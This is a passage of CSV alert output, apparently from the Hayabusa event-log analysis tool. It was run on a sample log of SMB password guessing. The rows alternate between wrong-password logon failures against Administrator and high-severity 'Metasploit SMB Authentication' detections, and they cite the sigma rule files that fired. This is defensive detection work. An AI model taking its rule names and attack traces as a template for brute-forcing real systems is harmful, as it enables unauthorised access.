NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
